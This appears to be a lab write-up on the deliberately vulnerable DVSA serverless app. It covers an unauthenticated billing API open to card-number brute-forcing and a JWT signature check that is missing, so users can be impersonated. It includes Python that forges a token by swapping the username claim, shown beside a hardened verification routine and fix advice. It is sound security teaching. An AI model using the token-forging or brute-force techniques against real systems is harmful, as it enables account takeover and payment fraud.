The DVSA uses a dedicated API call to process billing requests. However, that API can be invoked by anyone without authentication, which lets an attacker brute-force credit card numbers through the payment processing API:
The DVSA uses AWS Cognito for authentication. The Authorization header carries a JSON Web Token (JWT) holding the user's identity claims. However, the application does not verify the JWT's signature, so it is possible to send requests that impersonate other users.
For example, sending the {"action": "orders"} request returns the user's own orders:
Decoding the JWT from the Authorization header shows our own identity claims:
But if we take the middle part (the payload), base64url-decode it, replace the username with the victim's username and re-encode it, leaving the original signature in place since it is never checked, we get:
Sending the request with this token now returns the victim's orders:
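The tampering described above, and the check that would stop it, as an added example written for this page (it is not code from the writeup or from the DVSA project). It assumes the claim being swapped is named "username" (a Cognito ID token actually names it "cognito:username", but the writeup's wording is kept) and signs the constructed sample token with HS256 so it runs offline; Cognito issues RS256 tokens verified against the user pool's JWKS, but the payload edit and the missing verification are the same either way.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(data: str) -> bytes:
    """Base64url-decode one JWT segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(data: bytes) -> str:
    """Base64url-encode without padding, as JWT segments are written."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def make_token(payload: dict, key: bytes) -> str:
    """Build a signed HS256 token. Stand-in signer for the constructed sample;
    Cognito uses RS256, but the attack below does not depend on the algorithm."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def forge_token(token: str, claim: str, new_value: str) -> str:
    """The attack from the writeup: decode the middle segment, swap one claim,
    re-encode it, and keep the original header and (now invalid) signature."""
    header, body, signature = token.split(".")
    claims = json.loads(b64url_decode(body))
    claims[claim] = new_value
    return f"{header}.{b64url_encode(json.dumps(claims).encode())}.{signature}"


def identity_unverified(token: str, claim: str = "username") -> str:
    """What the vulnerable backend does: read the claim straight out of the
    payload without checking the signature, so a forged token is trusted."""
    return json.loads(b64url_decode(token.split(".")[1]))[claim]


def signature_valid(token: str, key: bytes) -> bool:
    """Recompute the signature over header.payload and compare in constant
    time. Also pin the algorithm so an attacker-chosen "alg" is rejected."""
    header, body, signature = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        return False
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(signature))


def identity_verified(token: str, key: bytes, claim: str = "username") -> str:
    """Hardened form: refuse to read any claim until the signature checks out."""
    if not signature_valid(token, key):
        raise ValueError("invalid JWT signature")
    return json.loads(b64url_decode(token.split(".")[1]))[claim]


if __name__ == "__main__":
    KEY = b"constructed-demo-key"  # constructed for the example, not a real key
    own = make_token({"sub": "1111", "username": "attacker"}, KEY)
    forged = forge_token(own, "username", "victim")
    print(identity_unverified(forged))  # the forged identity is accepted
    print(signature_valid(own, KEY), signature_valid(forged, KEY))
```

The fix in a real Cognito-backed function is the same shape as identity_verified: fetch the user pool's JWKS, verify the RS256 signature and the expected issuer, audience and expiry, and only then read the username claim; any code path that reads claims out of the payload first is the bug the writeup exploits.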